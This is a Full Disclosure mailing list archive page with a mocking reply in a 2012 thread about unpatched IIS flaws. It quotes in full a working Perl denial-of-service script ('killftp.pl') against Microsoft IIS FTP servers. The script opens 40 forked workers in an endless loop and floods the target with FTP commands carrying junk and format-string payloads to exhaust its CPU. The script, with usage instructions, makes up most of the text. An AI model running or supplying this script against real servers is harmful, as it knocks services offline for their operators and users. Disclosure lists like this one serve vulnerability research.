Full Disclosure mailing list archives
Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
From: Григорий Братислава <musntlive () gmail com>
Date: Mon, 16 Jul 2012 15:43:53 -0400
MusntLive is find your problem: echo "
# Exploit Title: Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service (CPU exhaustion) # Date: June 29, 2012 # Author: coolkaveh # coolkaveh () rocketmail com # https://twitter.com/coolkaveh # Vendor Homepage: http://www.microsoft.com # Version: Microsoft IIS 6 , 7.5 FTP Server # Tested on: windows server 2008 r2 , seven , #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #When sending multiple parallel FTP command requests to a Microsoft IIS FTP Server #CPU usage goes up to max capacity and server gets non responsive. test it with two core #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Lame Microsoft IIS FTP Server Remote Denial Of Service #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
" | sed 's:coo:xXxcoo:g;s:veh:vehxXx:g;s:> ::g;s:e:3:g;s:a:@:g;s:i:\!:g;s:u:\\\/:g;s:o:\(\):g' Is code of yours is not hacker code. MusntLive patch is your code above. Re-test. Tested under BeOS is confirmed On Mon, Jul 16, 2012 at 3:18 PM, kaveh ghaemmaghami <kavehghaemmaghami () googlemail com> wrote:
Hi OK i will plus they didn't fix http://seclists.org/fulldisclosure/2012/Jul/27 # Exploit Title: Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service (CPU exhaustion) # Date: June 29, 2012 # Author: coolkaveh # coolkaveh () rocketmail com # https://twitter.com/coolkaveh # Vendor Homepage: http://www.microsoft.com # Version: Microsoft IIS 6 , 7.5 FTP Server # Tested on: windows server 2008 r2 , seven , #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #When sending multiple parallel FTP command requests to a Microsoft IIS FTP Server #CPU usage goes up to max capacity and server gets non responsive. test it with two core #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Lame Microsoft IIS FTP Server Remote Denial Of Service #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #!/usr/bin/perl -w use IO::Socket; use Parallel::ForkManager; $|=1; sub usage { print "Please DISABLE firewall daemon of this operating system first!\n"; print "FTP Server Remote Denial Of Service\n"; print "by coolkaveh\n"; print "usage: perl killftp.pl <host> \n"; print "example: perl killftp.pl www.example.com \n"; } $host=shift; $port=shift || "21"; if(!defined($host)){ print "Please DISABLE firewall daemon of this operating system first!\n"; print "FTP Server Remote Denial Of Service\n"; print "by coolkaveh\n"; print "coolkaveh () rocketmail com\n"; print "usage: perl killftp.pl <host> \n"; print "example: perl killftp.pl www.example.com \n"; exit(0); } $check_first=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60); if(defined $check_first){ print "$host -> $port is alive.\n"; $check_first->close; } else{ die("$host -> $port is closed!\n"); } @junk=('A'x5,'A'x17,'A'x33,'A'x65,'A'x76,'A'x129,'A'x257,'A'x513,'A'x1024, '%s%p%x%d','024d','%.2049d','%p%p%p%p','%x%x%x%x','%d%d%d%d','%s%s%s%s','%99999999999s', '%08x','%%20d','%%20n','%%20x','%%20s','%s%s%s%s%s%s%s%s%s%s','%p%p%p%p%p%p%p%p%p%p', '%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%','%s'x129,'%x'x257,'-1','0','0x100', '0x1000','0x3fffffff','0x7ffffffe','0x7fffffff','0x80000000','0xfffffffe','0xffffffff','0x10000','0x100000','1', ); @command=( 'NLST','CWD','STOR','RETR', 'MKD','RMD','DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE', 'APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD', 'STOR','RETR','MKD', 'RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT', 'HELP','MODE','APPE','STRU','SITE','SITE INDEX', 'TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD', 'STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM', 'SIZE','STAT','ACCT', 'HELP','MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I', 'NLST','CWD','STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE', 'STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD','STOR','RETR','MKD','RMD','DELE', 'RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E', 'TYPE L','TYPE I','NLST','CWD','STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP', 'MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A', ); print "Dosing Server!\n"; $pm = new Parallel::ForkManager(40); while (1) { my $pid = $pm->start and next; COMMAND_LIST: foreach $cmd (@command){ foreach $poc (@junk){ LABEL5: $sock4=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp', Timeout=>30); if(defined($sock4)){ $sock4->send("$cmd"." "."$poc\r\n", 0); $sock4->recv($content, 100, 0); } } } $pm->finish; } On Mon, Jul 16, 2012 at 11:54 AM, Григорий Братислава <musntlive () gmail com> wrote:On Mon, Jul 16, 2012 at 2:50 PM, kaveh ghaemmaghami <kavehghaemmaghami () googlemail com> wrote:Hello list in my testing environment (IIS 6 with php5 ) the flaw exist ..... i think i got da move to XAMPP MS wont patch it LOLTest environment is not production environment. Is place your test server in your production network and is send me information for to test.
-- `Wherever I is go - there am I routed` _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin king cope (Jul 16)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 16)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Thor (Hammer of God) (Jul 16)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 16)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin king cope (Jul 16)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 16)
- Message not available
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 16)
- Message not available
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 16)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Thor (Hammer of God) (Jul 16)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 16)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 17)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin king cope (Jul 17)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 17)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Gage Bystrom (Jul 17)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 17)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Gage Bystrom (Jul 17)
- Message not available
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 17)
- Message not available
- Message not available
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 17)